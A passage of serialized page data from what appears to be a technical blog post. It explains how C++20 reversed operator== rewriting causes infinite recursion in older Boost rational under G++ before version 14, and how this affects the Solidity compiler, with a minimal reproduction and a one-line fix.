T2);",{"type":24,"tag":2659,"props":97737,"children":97738},{},[97739,97741,97747],{"type":30,"value":97740},"Then ",{"type":24,"tag":145,"props":97742,"children":97744},{"className":97743},[],[97745],{"type":30,"value":97746},"T2 == T1",{"type":30,"value":97748}," may call the same function by reversing the arguments.",{"type":24,"tag":32,"props":97750,"children":97751},{},[97752,97754,97759,97760,97765,97767,97773,97775,97780],{"type":30,"value":97753},"This rewrite is ",{"type":24,"tag":60,"props":97755,"children":97756},{},[97757],{"type":30,"value":97758},"recursive",{"type":30,"value":5615},{"type":24,"tag":145,"props":97761,"children":97763},{"className":97762},[],[97764],{"type":30,"value":96948},{"type":30,"value":97766}," becomes ",{"type":24,"tag":145,"props":97768,"children":97770},{"className":97769},[],[97771],{"type":30,"value":97772},"b == a",{"type":30,"value":97774},", which becomes ",{"type":24,"tag":145,"props":97776,"children":97778},{"className":97777},[],[97779],{"type":30,"value":96948},{"type":30,"value":97781}," again, and so on — if not handled carefully.",{"type":24,"tag":32,"props":97783,"children":97784},{},[97785],{"type":30,"value":97786},"This is great for reducing boilerplate — unless the call becomes ambiguous or self-referential.",{"type":24,"tag":2719,"props":97788,"children":97789},{},[],{"type":24,"tag":43,"props":97791,"children":97793},{"id":97792},"part-iii-the-boost-trapdoor",[97794],{"type":30,"value":97795},"Part III: The Boost Trapdoor",{"type":24,"tag":32,"props":97797,"children":97798},{},[97799,97801,97807,97809,97814],{"type":30,"value":97800},"The old Boost ",{"type":24,"tag":145,"props":97802,"children":97804},{"className":97803},[],[97805],{"type":30,"value":97806},"rational",{"type":30,"value":97808}," class (prior to v1.75) defined both member function and non-member function of ",{"type":24,"tag":145,"props":97810,"children":97812},{"className":97811},[],[97813],{"type":30,"value":96956},{"type":30,"value":1679},{"type":24,"tag":291,"props":97816,"children":97818},{"code":97817,"language":35868,"meta":7,"className":35866,"style":7},"template \u003Cclass Arg, class IntType>\ntemplate \u003Ctypename IntType>\nclass rational\n{\n ...\npublic:\n ...\n \n template \u003Cclass T>\n BOOST_CONSTEXPR typename boost::enable_if_c\u003Crational_detail::is_compatible_integer\u003CT, IntType>::value, bool>::type operator== (const T& i) const\n {\n return ((den == IntType(1)) && (num == i));\n }\n ...\n}\n\ntemplate \u003Cclass Arg, class IntType>\nBOOST_CONSTEXPR\ninline typename boost::enable_if_c \u003C\n rational_detail::is_compatible_integer\u003CArg, IntType>::value, bool>::type\n operator == (const Arg& b, const rational\u003CIntType>& a)\n{\n return a == b; \n}\n",[97819],{"type":24,"tag":145,"props":97820,"children":97821},{"__ignoreMap":7},[97822,97857,97880,97892,97899,97906,97913,97920,97927,97950,98038,98045,98096,98103,98110,98117,98124,98159,98167,98195,98234,98299,98306,98326],{"type":24,"tag":301,"props":97823,"children":97824},{"class":303,"line":304},[97825,97829,97833,97837,97841,97845,97849,97853],{"type":24,"tag":301,"props":97826,"children":97827},{"style":348},[97828],{"type":30,"value":72928},{"type":24,"tag":301,"props":97830,"children":97831},{"style":359},[97832],{"type":30,"value":3950},{"type":24,"tag":301,"props":97834,"children":97835},{"style":348},[97836],{"type":30,"value":77123},{"type":24,"tag":301,"props":97838,"children":97839},{"style":10246},[97840],{"type":30,"value":97329},{"type":24,"tag":301,"props":97842,"children":97843},{"style":359},[97844],{"type":30,"value":377},{"type":24,"tag":301,"props":97846,"children":97847},{"style":348},[97848],{"type":30,"value":77123},{"type":24,"tag":301,"props":97850,"children":97851},{"style":10246},[97852],{"type":30,"value":97148},{"type":24,"tag":301,"props":97854,"children":97855},{"style":359},[97856],{"type":30,"value":12812},{"type":24,"tag":301,"props":97858,"children":97859},{"class":303,"line":320},[97860,97864,97868,97872,97876],{"type":24,"tag":301,"props":97861,"children":97862},{"style":348},[97863],{"type":30,"value":72928},{"type":24,"tag":301,"props":97865,"children":97866},{"style":359},[97867],{"type":30,"value":3950},{"type":24,"tag":301,"props":97869,"children":97870},{"style":348},[97871],{"type":30,"value":97143},{"type":24,"tag":301,"props":97873,"children":97874},{"style":10246},[97875],{"type":30,"value":97148},{"type":24,"tag":301,"props":97877,"children":97878},{"style":359},[97879],{"type":30,"value":12812},{"type":24,"tag":301,"props":97881,"children":97882},{"class":303,"line":335},[97883,97887],{"type":24,"tag":301,"props":97884,"children":97885},{"style":348},[97886],{"type":30,"value":77123},{"type":24,"tag":301,"props":97888,"children":97889},{"style":10246},[97890],{"type":30,"value":97891}," rational\n",{"type":24,"tag":301,"props":97893,"children":97894},{"class":303,"line":344},[97895],{"type":24,"tag":301,"props":97896,"children":97897},{"style":359},[97898],{"type":30,"value":799},{"type":24,"tag":301,"props":97900,"children":97901},{"class":303,"line":401},[97902],{"type":24,"tag":301,"props":97903,"children":97904},{"style":359},[97905],{"type":30,"value":27110},{"type":24,"tag":301,"props":97907,"children":97908},{"class":303,"line":415},[97909],{"type":24,"tag":301,"props":97910,"children":97911},{"style":348},[97912],{"type":30,"value":97176},{"type":24,"tag":301,"props":97914,"children":97915},{"class":303,"line":439},[97916],{"type":24,"tag":301,"props":97917,"children":97918},{"style":359},[97919],{"type":30,"value":27110},{"type":24,"tag":301,"props":97921,"children":97922},{"class":303,"line":447},[97923],{"type":24,"tag":301,"props":97924,"children":97925},{"style":359},[97926],{"type":30,"value":649},{"type":24,"tag":301,"props":97928,"children":97929},{"class":303,"line":476},[97930,97934,97938,97942,97946],{"type":24,"tag":301,"props":97931,"children":97932},{"style":348},[97933],{"type":30,"value":97184},{"type":24,"tag":301,"props":97935,"children":97936},{"style":359},[97937],{"type":30,"value":3950},{"type":24,"tag":301,"props":97939,"children":97940},{"style":348},[97941],{"type":30,"value":77123},{"type":24,"tag":301,"props":97943,"children":97944},{"style":10246},[97945],{"type":30,"value":12738},{"type":24,"tag":301,"props":97947,"children":97948},{"style":359},[97949],{"type":30,"value":12812},{"type":24,"tag":301,"props":97951,"children":97952},{"class":303,"line":495},[97953,97958,97962,97967,97971,97975,97979,97984,97988,97992,97996,98000,98004,98008,98013,98017,98021,98025,98029,98033],{"type":24,"tag":301,"props":97954,"children":97955},{"style":359},[97956],{"type":30,"value":97957}," BOOST_CONSTEXPR ",{"type":24,"tag":301,"props":97959,"children":97960},{"style":348},[97961],{"type":30,"value":97143},{"type":24,"tag":301,"props":97963,"children":97964},{"style":359},[97965],{"type":30,"value":97966}," boost::enable_if_c\u003Crational_detail::is_compatible_integer\u003C",{"type":24,"tag":301,"props":97968,"children":97969},{"style":10246},[97970],{"type":30,"value":12807},{"type":24,"tag":301,"props":97972,"children":97973},{"style":359},[97974],{"type":30,"value":377},{"type":24,"tag":301,"props":97976,"children":97977},{"style":10246},[97978],{"type":30,"value":97377},{"type":24,"tag":301,"props":97980,"children":97981},{"style":359},[97982],{"type":30,"value":97983},">::",{"type":24,"tag":301,"props":97985,"children":97986},{"style":10246},[97987],{"type":30,"value":5958},{"type":24,"tag":301,"props":97989,"children":97990},{"style":359},[97991],{"type":30,"value":377},{"type":24,"tag":301,"props":97993,"children":97994},{"style":348},[97995],{"type":30,"value":36442},{"type":24,"tag":301,"props":97997,"children":97998},{"style":359},[97999],{"type":30,"value":97983},{"type":24,"tag":301,"props":98001,"children":98002},{"style":10246},[98003],{"type":30,"value":7026},{"type":24,"tag":301,"props":98005,"children":98006},{"style":348},[98007],{"type":30,"value":97212},{"type":24,"tag":301,"props":98009,"children":98010},{"style":359},[98011],{"type":30,"value":98012},"== (",{"type":24,"tag":301,"props":98014,"children":98015},{"style":348},[98016],{"type":30,"value":16460},{"type":24,"tag":301,"props":98018,"children":98019},{"style":10246},[98020],{"type":30,"value":12738},{"type":24,"tag":301,"props":98022,"children":98023},{"style":348},[98024],{"type":30,"value":556},{"type":24,"tag":301,"props":98026,"children":98027},{"style":369},[98028],{"type":30,"value":10225},{"type":24,"tag":301,"props":98030,"children":98031},{"style":359},[98032],{"type":30,"value":911},{"type":24,"tag":301,"props":98034,"children":98035},{"style":348},[98036],{"type":30,"value":98037},"const\n",{"type":24,"tag":301,"props":98039,"children":98040},{"class":303,"line":504},[98041],{"type":24,"tag":301,"props":98042,"children":98043},{"style":359},[98044],{"type":30,"value":35943},{"type":24,"tag":301,"props":98046,"children":98047},{"class":303,"line":512},[98048,98053,98058,98062,98066,98070,98074,98078,98082,98087,98091],{"type":24,"tag":301,"props":98049,"children":98050},{"style":308},[98051],{"type":30,"value":98052}," return",{"type":24,"tag":301,"props":98054,"children":98055},{"style":359},[98056],{"type":30,"value":98057}," ((den ",{"type":24,"tag":301,"props":98059,"children":98060},{"style":385},[98061],{"type":30,"value":607},{"type":24,"tag":301,"props":98063,"children":98064},{"style":314},[98065],{"type":30,"value":97148},{"type":24,"tag":301,"props":98067,"children":98068},{"style":359},[98069],{"type":30,"value":362},{"type":24,"tag":301,"props":98071,"children":98072},{"style":466},[98073],{"type":30,"value":546},{"type":24,"tag":301,"props":98075,"children":98076},{"style":359},[98077],{"type":30,"value":15649},{"type":24,"tag":301,"props":98079,"children":98080},{"style":385},[98081],{"type":30,"value":5639},{"type":24,"tag":301,"props":98083,"children":98084},{"style":359},[98085],{"type":30,"value":98086}," (num ",{"type":24,"tag":301,"props":98088,"children":98089},{"style":385},[98090],{"type":30,"value":607},{"type":24,"tag":301,"props":98092,"children":98093},{"style":359},[98094],{"type":30,"value":98095}," i));\n",{"type":24,"tag":301,"props":98097,"children":98098},{"class":303,"line":592},[98099],{"type":24,"tag":301,"props":98100,"children":98101},{"style":359},[98102],{"type":30,"value":501},{"type":24,"tag":301,"props":98104,"children":98105},{"class":303,"line":619},[98106],{"type":24,"tag":301,"props":98107,"children":98108},{"style":359},[98109],{"type":30,"value":27110},{"type":24,"tag":301,"props":98111,"children":98112},{"class":303,"line":635},[98113],{"type":24,"tag":301,"props":98114,"children":98115},{"style":359},[98116],{"type":30,"value":698},{"type":24,"tag":301,"props":98118,"children":98119},{"class":303,"line":643},[98120],{"type":24,"tag":301,"props":98121,"children":98122},{"emptyLinePlaceholder":16},[98123],{"type":30,"value":341},{"type":24,"tag":301,"props":98125,"children":98126},{"class":303,"line":652},[98127,98131,98135,98139,98143,98147,98151,98155],{"type":24,"tag":301,"props":98128,"children":98129},{"style":348},[98130],{"type":30,"value":72928},{"type":24,"tag":301,"props":98132,"children":98133},{"style":359},[98134],{"type":30,"value":3950},{"type":24,"tag":301,"props":98136,"children":98137},{"style":348},[98138],{"type":30,"value":77123},{"type":24,"tag":301,"props":98140,"children":98141},{"style":10246},[98142],{"type":30,"value":97329},{"type":24,"tag":301,"props":98144,"children":98145},{"style":359},[98146],{"type":30,"value":377},{"type":24,"tag":301,"props":98148,"children":98149},{"style":348},[98150],{"type":30,"value":77123},{"type":24,"tag":301,"props":98152,"children":98153},{"style":10246},[98154],{"type":30,"value":97148},{"type":24,"tag":301,"props":98156,"children":98157},{"style":359},[98158],{"type":30,"value":12812},{"type":24,"tag":301,"props":98160,"children":98161},{"class":303,"line":666},[98162],{"type":24,"tag":301,"props":98163,"children":98164},{"style":359},[98165],{"type":30,"value":98166},"BOOST_CONSTEXPR\n",{"type":24,"tag":301,"props":98168,"children":98169},{"class":303,"line":674},[98170,98175,98180,98185,98190],{"type":24,"tag":301,"props":98171,"children":98172},{"style":348},[98173],{"type":30,"value":98174},"inline",{"type":24,"tag":301,"props":98176,"children":98177},{"style":348},[98178],{"type":30,"value":98179}," typename",{"type":24,"tag":301,"props":98181,"children":98182},{"style":359},[98183],{"type":30,"value":98184}," boost::",{"type":24,"tag":301,"props":98186,"children":98187},{"style":10246},[98188],{"type":30,"value":98189},"enable_if_c",{"type":24,"tag":301,"props":98191,"children":98192},{"style":385},[98193],{"type":30,"value":98194}," \u003C\n",{"type":24,"tag":301,"props":98196,"children":98197},{"class":303,"line":692},[98198,98203,98208,98212,98216,98221,98225,98229],{"type":24,"tag":301,"props":98199,"children":98200},{"style":359},[98201],{"type":30,"value":98202}," rational_detail::is_compatible_integer\u003C",{"type":24,"tag":301,"props":98204,"children":98205},{"style":10246},[98206],{"type":30,"value":98207},"Arg",{"type":24,"tag":301,"props":98209,"children":98210},{"style":359},[98211],{"type":30,"value":377},{"type":24,"tag":301,"props":98213,"children":98214},{"style":10246},[98215],{"type":30,"value":97377},{"type":24,"tag":301,"props":98217,"children":98218},{"style":359},[98219],{"type":30,"value":98220},">::value, ",{"type":24,"tag":301,"props":98222,"children":98223},{"style":348},[98224],{"type":30,"value":36442},{"type":24,"tag":301,"props":98226,"children":98227},{"style":385},[98228],{"type":30,"value":1456},{"type":24,"tag":301,"props":98230,"children":98231},{"style":359},[98232],{"type":30,"value":98233},"::type\n",{"type":24,"tag":301,"props":98235,"children":98236},{"class":303,"line":3631},[98237,98242,98247,98251,98255,98259,98263,98267,98271,98275,98279,98283,98287,98291,98295],{"type":24,"tag":301,"props":98238,"children":98239},{"style":348},[98240],{"type":30,"value":98241}," operator",{"type":24,"tag":301,"props":98243,"children":98244},{"style":359},[98245],{"type":30,"value":98246}," == (",{"type":24,"tag":301,"props":98248,"children":98249},{"style":348},[98250],{"type":30,"value":16460},{"type":24,"tag":301,"props":98252,"children":98253},{"style":10246},[98254],{"type":30,"value":97329},{"type":24,"tag":301,"props":98256,"children":98257},{"style":348},[98258],{"type":30,"value":556},{"type":24,"tag":301,"props":98260,"children":98261},{"style":369},[98262],{"type":30,"value":97410},{"type":24,"tag":301,"props":98264,"children":98265},{"style":359},[98266],{"type":30,"value":377},{"type":24,"tag":301,"props":98268,"children":98269},{"style":348},[98270],{"type":30,"value":16460},{"type":24,"tag":301,"props":98272,"children":98273},{"style":10246},[98274],{"type":30,"value":97164},{"type":24,"tag":301,"props":98276,"children":98277},{"style":359},[98278],{"type":30,"value":1849},{"type":24,"tag":301,"props":98280,"children":98281},{"style":10246},[98282],{"type":30,"value":97377},{"type":24,"tag":301,"props":98284,"children":98285},{"style":359},[98286],{"type":30,"value":1456},{"type":24,"tag":301,"props":98288,"children":98289},{"style":348},[98290],{"type":30,"value":556},{"type":24,"tag":301,"props":98292,"children":98293},{"style":369},[98294],{"type":30,"value":96538},{"type":24,"tag":301,"props":98296,"children":98297},{"style":359},[98298],{"type":30,"value":791},{"type":24,"tag":301,"props":98300,"children":98301},{"class":303,"line":3639},[98302],{"type":24,"tag":301,"props":98303,"children":98304},{"style":359},[98305],{"type":30,"value":799},{"type":24,"tag":301,"props":98307,"children":98308},{"class":303,"line":3647},[98309,98313,98317,98321],{"type":24,"tag":301,"props":98310,"children":98311},{"style":308},[98312],{"type":30,"value":46092},{"type":24,"tag":301,"props":98314,"children":98315},{"style":359},[98316],{"type":30,"value":23545},{"type":24,"tag":301,"props":98318,"children":98319},{"style":385},[98320],{"type":30,"value":607},{"type":24,"tag":301,"props":98322,"children":98323},{"style":359},[98324],{"type":30,"value":98325}," b; \n",{"type":24,"tag":301,"props":98327,"children":98328},{"class":303,"line":3685},[98329],{"type":24,"tag":301,"props":98330,"children":98331},{"style":359},[98332],{"type":30,"value":698},{"type":24,"tag":32,"props":98334,"children":98335},{},[98336,98338,98344],{"type":30,"value":98337},"This was designed under C++17 semantics. Back then, ",{"type":24,"tag":145,"props":98339,"children":98341},{"className":98340},[],[98342],{"type":30,"value":98343},"rhs == lhs",{"type":30,"value":98345}," would fall back to member overloads if available. All good.",{"type":24,"tag":32,"props":98347,"children":98348},{},[98349,98351,98356,98357,98363],{"type":30,"value":98350},"But under ",{"type":24,"tag":145,"props":98352,"children":98354},{"className":98353},[],[98355],{"type":30,"value":96902},{"type":30,"value":28273},{"type":24,"tag":145,"props":98358,"children":98360},{"className":98359},[],[98361],{"type":30,"value":98362},"G++ \u003C 14",{"type":30,"value":1679},{"type":24,"tag":2655,"props":98365,"children":98366},{},[98367,98372,98377,98382],{"type":24,"tag":2659,"props":98368,"children":98369},{},[98370],{"type":30,"value":98371},"G++ incorrectly chooses this non-member operator first",{"type":24,"tag":2659,"props":98373,"children":98374},{},[98375],{"type":30,"value":98376},"C++20 reverses the comparison",{"type":24,"tag":2659,"props":98378,"children":98379},{},[98380],{"type":30,"value":98381},"Which calls the same function again with arguments flipped",{"type":24,"tag":2659,"props":98383,"children":98384},{},[98385],{"type":30,"value":98386},"And so on...",{"type":24,"tag":32,"props":98388,"children":98389},{},[98390,98392,98397],{"type":30,"value":98391},"This creates ",{"type":24,"tag":60,"props":98393,"children":98394},{},[98395],{"type":30,"value":98396},"infinite recursion",{"type":30,"value":206},{"type":24,"tag":32,"props":98399,"children":98400},{},[98401],{"type":30,"value":98402},"A minimal example:",{"type":24,"tag":291,"props":98404,"children":98406},{"code":98405,"language":35868,"meta":7,"className":35866,"style":7},"// g++ -std=c++20 -o crash main.cpp && ./crash\n#include \u003Cboost/rational.hpp>\n\nint main() {\n boost::rational\u003Cint> r;\n return r == 0;\n}\n",[98407],{"type":24,"tag":145,"props":98408,"children":98409},{"__ignoreMap":7},[98410,98418,98430,98437,98452,98476,98499],{"type":24,"tag":301,"props":98411,"children":98412},{"class":303,"line":304},[98413],{"type":24,"tag":301,"props":98414,"children":98415},{"style":1062},[98416],{"type":30,"value":98417},"// g++ -std=c++20 -o crash main.cpp && ./crash\n",{"type":24,"tag":301,"props":98419,"children":98420},{"class":303,"line":320},[98421,98425],{"type":24,"tag":301,"props":98422,"children":98423},{"style":308},[98424],{"type":30,"value":326},{"type":24,"tag":301,"props":98426,"children":98427},{"style":329},[98428],{"type":30,"value":98429}," \u003Cboost/rational.hpp>\n",{"type":24,"tag":301,"props":98431,"children":98432},{"class":303,"line":335},[98433],{"type":24,"tag":301,"props":98434,"children":98435},{"emptyLinePlaceholder":16},[98436],{"type":30,"value":341},{"type":24,"tag":301,"props":98438,"children":98439},{"class":303,"line":344},[98440,98444,98448],{"type":24,"tag":301,"props":98441,"children":98442},{"style":348},[98443],{"type":30,"value":351},{"type":24,"tag":301,"props":98445,"children":98446},{"style":314},[98447],{"type":30,"value":356},{"type":24,"tag":301,"props":98449,"children":98450},{"style":359},[98451],{"type":30,"value":3883},{"type":24,"tag":301,"props":98453,"children":98454},{"class":303,"line":401},[98455,98460,98464,98468,98472],{"type":24,"tag":301,"props":98456,"children":98457},{"style":359},[98458],{"type":30,"value":98459}," boost::rational",{"type":24,"tag":301,"props":98461,"children":98462},{"style":385},[98463],{"type":30,"value":1849},{"type":24,"tag":301,"props":98465,"children":98466},{"style":348},[98467],{"type":30,"value":351},{"type":24,"tag":301,"props":98469,"children":98470},{"style":385},[98471],{"type":30,"value":1456},{"type":24,"tag":301,"props":98473,"children":98474},{"style":359},[98475],{"type":30,"value":97508},{"type":24,"tag":301,"props":98477,"children":98478},{"class":303,"line":415},[98479,98483,98487,98491,98495],{"type":24,"tag":301,"props":98480,"children":98481},{"style":308},[98482],{"type":30,"value":680},{"type":24,"tag":301,"props":98484,"children":98485},{"style":359},[98486],{"type":30,"value":97520},{"type":24,"tag":301,"props":98488,"children":98489},{"style":385},[98490],{"type":30,"value":607},{"type":24,"tag":301,"props":98492,"children":98493},{"style":466},[98494],{"type":30,"value":685},{"type":24,"tag":301,"props":98496,"children":98497},{"style":359},[98498],{"type":30,"value":492},{"type":24,"tag":301,"props":98500,"children":98501},{"class":303,"line":439},[98502],{"type":24,"tag":301,"props":98503,"children":98504},{"style":359},[98505],{"type":30,"value":698},{"type":24,"tag":32,"props":98507,"children":98508},{},[98509],{"type":30,"value":98510},"Expected output: nothing.",{"type":24,"tag":32,"props":98512,"children":98513},{},[98514],{"type":30,"value":98515},"Actual: segmentation fault (stack overflow).",{"type":24,"tag":32,"props":98517,"children":98518},{},[98519,98521,98528],{"type":30,"value":98520},"This exact pattern was ",{"type":24,"tag":188,"props":98522,"children":98525},{"href":98523,"rel":98524},"https://github.com/boostorg/rational/issues/43",[192],[98526],{"type":30,"value":98527},"reported and fixed in Boost rational",{"type":30,"value":98529},", but only in version 1.75+.",{"type":24,"tag":32,"props":98531,"children":98532},{},[98533],{"type":30,"value":98534},"Here’s the one-line fix:",{"type":24,"tag":291,"props":98536,"children":98538},{"code":98537,"language":47098,"meta":7,"className":47096,"style":7},"template \u003Cclass Arg, class IntType>\nBOOST_CONSTEXPR\ninline typename boost::enable_if_c \u003C\n rational_detail::is_compatible_integer\u003CArg, IntType>::value, bool>::type\n operator == (const Arg& b, const rational\u003CIntType>& a)\n{\n- return a == b;\n+ return a.operator==(b);\n}\n",[98539],{"type":24,"tag":145,"props":98540,"children":98541},{"__ignoreMap":7},[98542,98550,98557,98565,98573,98581,98588,98596,98604],{"type":24,"tag":301,"props":98543,"children":98544},{"class":303,"line":304},[98545],{"type":24,"tag":301,"props":98546,"children":98547},{"style":359},[98548],{"type":30,"value":98549},"template \u003Cclass Arg, class IntType>\n",{"type":24,"tag":301,"props":98551,"children":98552},{"class":303,"line":320},[98553],{"type":24,"tag":301,"props":98554,"children":98555},{"style":359},[98556],{"type":30,"value":98166},{"type":24,"tag":301,"props":98558,"children":98559},{"class":303,"line":335},[98560],{"type":24,"tag":301,"props":98561,"children":98562},{"style":359},[98563],{"type":30,"value":98564},"inline typename boost::enable_if_c \u003C\n",{"type":24,"tag":301,"props":98566,"children":98567},{"class":303,"line":344},[98568],{"type":24,"tag":301,"props":98569,"children":98570},{"style":359},[98571],{"type":30,"value":98572}," rational_detail::is_compatible_integer\u003CArg, IntType>::value, bool>::type\n",{"type":24,"tag":301,"props":98574,"children":98575},{"class":303,"line":401},[98576],{"type":24,"tag":301,"props":98577,"children":98578},{"style":359},[98579],{"type":30,"value":98580}," operator == (const Arg& b, const rational\u003CIntType>& a)\n",{"type":24,"tag":301,"props":98582,"children":98583},{"class":303,"line":415},[98584],{"type":24,"tag":301,"props":98585,"children":98586},{"style":359},[98587],{"type":30,"value":799},{"type":24,"tag":301,"props":98589,"children":98590},{"class":303,"line":439},[98591],{"type":24,"tag":301,"props":98592,"children":98593},{"style":329},[98594],{"type":30,"value":98595},"- return a == b;\n",{"type":24,"tag":301,"props":98597,"children":98598},{"class":303,"line":447},[98599],{"type":24,"tag":301,"props":98600,"children":98601},{"style":466},[98602],{"type":30,"value":98603},"+ return a.operator==(b);\n",{"type":24,"tag":301,"props":98605,"children":98606},{"class":303,"line":476},[98607],{"type":24,"tag":301,"props":98608,"children":98609},{"style":359},[98610],{"type":30,"value":698},{"type":24,"tag":32,"props":98612,"children":98613},{},[98614,98616,98621,98623,98628],{"type":30,"value":98615},"Instead of calling ",{"type":24,"tag":145,"props":98617,"children":98619},{"className":98618},[],[98620],{"type":30,"value":96948},{"type":30,"value":98622}," — which triggers overload resolution again — the patched version directly calls the member function ",{"type":24,"tag":145,"props":98624,"children":98626},{"className":98625},[],[98627],{"type":30,"value":96956},{"type":30,"value":206},{"type":24,"tag":32,"props":98630,"children":98631},{},[98632],{"type":30,"value":98633},"This prevents C++20 from triggering recursive rewrites.",{"type":24,"tag":2719,"props":98635,"children":98636},{},[],{"type":24,"tag":43,"props":98638,"children":98640},{"id":98639},"part-iv-how-this-breaks-solidity",[98641],{"type":30,"value":98642},"Part IV: How This Breaks Solidity",{"type":24,"tag":32,"props":98644,"children":98645},{},[98646,98648,98653],{"type":30,"value":98647},"The Solidity codebase uses ",{"type":24,"tag":145,"props":98649,"children":98651},{"className":98650},[],[98652],{"type":30,"value":96803},{"type":30,"value":98654}," to represent certain compile-time constant expressions.",{"type":24,"tag":32,"props":98656,"children":98657},{},[98658,98660,98666],{"type":30,"value":98659},"One snippet that can trigger this issue appears in ",{"type":24,"tag":145,"props":98661,"children":98663},{"className":98662},[],[98664],{"type":30,"value":98665},"DeclarationTypeChecker::endVisit",{"type":30,"value":1679},{"type":24,"tag":291,"props":98668,"children":98670},{"code":98669,"language":35868,"meta":7,"className":35866,"style":7},"if (Expression const* length = _typeName.length()) {\n std::optional\u003Crational> lengthValue;\n\n if (length->annotation().type && length->annotation().type->category() == Type::Category::RationalNumber)\n ...\n else if (std::optional\u003CConstantEvaluator::TypedRational> value = ConstantEvaluator::evaluate(...))\n lengthValue = value->value;\n\n if (!lengthValue)\n ...\n else if (*lengthValue == 0) // \u003C-- Infinite recursion happens here\n ...\n}\n",[98671],{"type":24,"tag":145,"props":98672,"children":98673},{"__ignoreMap":7},[98674,98721,98746,98753,98831,98838,98890,98918,98925,98945,98952,98992,98999],{"type":24,"tag":301,"props":98675,"children":98676},{"class":303,"line":304},[98677,98681,98686,98690,98694,98699,98703,98708,98712,98716],{"type":24,"tag":301,"props":98678,"children":98679},{"style":308},[98680],{"type":30,"value":22368},{"type":24,"tag":301,"props":98682,"children":98683},{"style":359},[98684],{"type":30,"value":98685}," (Expression ",{"type":24,"tag":301,"props":98687,"children":98688},{"style":348},[98689],{"type":30,"value":16460},{"type":24,"tag":301,"props":98691,"children":98692},{"style":385},[98693],{"type":30,"value":772},{"type":24,"tag":301,"props":98695,"children":98696},{"style":359},[98697],{"type":30,"value":98698}," length ",{"type":24,"tag":301,"props":98700,"children":98701},{"style":385},[98702],{"type":30,"value":523},{"type":24,"tag":301,"props":98704,"children":98705},{"style":369},[98706],{"type":30,"value":98707}," _typeName",{"type":24,"tag":301,"props":98709,"children":98710},{"style":359},[98711],{"type":30,"value":206},{"type":24,"tag":301,"props":98713,"children":98714},{"style":314},[98715],{"type":30,"value":15318},{"type":24,"tag":301,"props":98717,"children":98718},{"style":359},[98719],{"type":30,"value":98720},"()) {\n",{"type":24,"tag":301,"props":98722,"children":98723},{"class":303,"line":320},[98724,98729,98733,98737,98741],{"type":24,"tag":301,"props":98725,"children":98726},{"style":359},[98727],{"type":30,"value":98728}," std::optional",{"type":24,"tag":301,"props":98730,"children":98731},{"style":385},[98732],{"type":30,"value":1849},{"type":24,"tag":301,"props":98734,"children":98735},{"style":359},[98736],{"type":30,"value":97806},{"type":24,"tag":301,"props":98738,"children":98739},{"style":385},[98740],{"type":30,"value":1456},{"type":24,"tag":301,"props":98742,"children":98743},{"style":359},[98744],{"type":30,"value":98745}," lengthValue;\n",{"type":24,"tag":301,"props":98747,"children":98748},{"class":303,"line":335},[98749],{"type":24,"tag":301,"props":98750,"children":98751},{"emptyLinePlaceholder":16},[98752],{"type":30,"value":341},{"type":24,"tag":301,"props":98754,"children":98755},{"class":303,"line":344},[98756,98760,98764,98768,98772,98776,98780,98784,98788,98793,98797,98801,98805,98809,98813,98818,98822,98826],{"type":24,"tag":301,"props":98757,"children":98758},{"style":308},[98759],{"type":30,"value":453},{"type":24,"tag":301,"props":98761,"children":98762},{"style":359},[98763],{"type":30,"value":873},{"type":24,"tag":301,"props":98765,"children":98766},{"style":369},[98767],{"type":30,"value":15318},{"type":24,"tag":301,"props":98769,"children":98770},{"style":359},[98771],{"type":30,"value":882},{"type":24,"tag":301,"props":98773,"children":98774},{"style":314},[98775],{"type":30,"value":36919},{"type":24,"tag":301,"props":98777,"children":98778},{"style":359},[98779],{"type":30,"value":36924},{"type":24,"tag":301,"props":98781,"children":98782},{"style":369},[98783],{"type":30,"value":7026},{"type":24,"tag":301,"props":98785,"children":98786},{"style":385},[98787],{"type":30,"value":20977},{"type":24,"tag":301,"props":98789,"children":98790},{"style":369},[98791],{"type":30,"value":98792}," length",{"type":24,"tag":301,"props":98794,"children":98795},{"style":359},[98796],{"type":30,"value":882},{"type":24,"tag":301,"props":98798,"children":98799},{"style":314},[98800],{"type":30,"value":36919},{"type":24,"tag":301,"props":98802,"children":98803},{"style":359},[98804],{"type":30,"value":36924},{"type":24,"tag":301,"props":98806,"children":98807},{"style":369},[98808],{"type":30,"value":7026},{"type":24,"tag":301,"props":98810,"children":98811},{"style":359},[98812],{"type":30,"value":882},{"type":24,"tag":301,"props":98814,"children":98815},{"style":314},[98816],{"type":30,"value":98817},"category",{"type":24,"tag":301,"props":98819,"children":98820},{"style":359},[98821],{"type":30,"value":20835},{"type":24,"tag":301,"props":98823,"children":98824},{"style":385},[98825],{"type":30,"value":607},{"type":24,"tag":301,"props":98827,"children":98828},{"style":359},[98829],{"type":30,"value":98830}," Type::Category::RationalNumber)\n",{"type":24,"tag":301,"props":98832,"children":98833},{"class":303,"line":401},[98834],{"type":24,"tag":301,"props":98835,"children":98836},{"style":359},[98837],{"type":30,"value":88547},{"type":24,"tag":301,"props":98839,"children":98840},{"class":303,"line":415},[98841,98846,98850,98855,98859,98864,98868,98872,98876,98881,98885],{"type":24,"tag":301,"props":98842,"children":98843},{"style":308},[98844],{"type":30,"value":98845}," else",{"type":24,"tag":301,"props":98847,"children":98848},{"style":308},[98849],{"type":30,"value":22574},{"type":24,"tag":301,"props":98851,"children":98852},{"style":359},[98853],{"type":30,"value":98854}," (std::optional",{"type":24,"tag":301,"props":98856,"children":98857},{"style":385},[98858],{"type":30,"value":1849},{"type":24,"tag":301,"props":98860,"children":98861},{"style":359},[98862],{"type":30,"value":98863},"ConstantEvaluator::TypedRational",{"type":24,"tag":301,"props":98865,"children":98866},{"style":385},[98867],{"type":30,"value":1456},{"type":24,"tag":301,"props":98869,"children":98870},{"style":359},[98871],{"type":30,"value":8499},{"type":24,"tag":301,"props":98873,"children":98874},{"style":385},[98875],{"type":30,"value":523},{"type":24,"tag":301,"props":98877,"children":98878},{"style":359},[98879],{"type":30,"value":98880}," ConstantEvaluator::",{"type":24,"tag":301,"props":98882,"children":98883},{"style":314},[98884],{"type":30,"value":44744},{"type":24,"tag":301,"props":98886,"children":98887},{"style":359},[98888],{"type":30,"value":98889},"(...))\n",{"type":24,"tag":301,"props":98891,"children":98892},{"class":303,"line":439},[98893,98898,98902,98906,98910,98914],{"type":24,"tag":301,"props":98894,"children":98895},{"style":359},[98896],{"type":30,"value":98897}," lengthValue 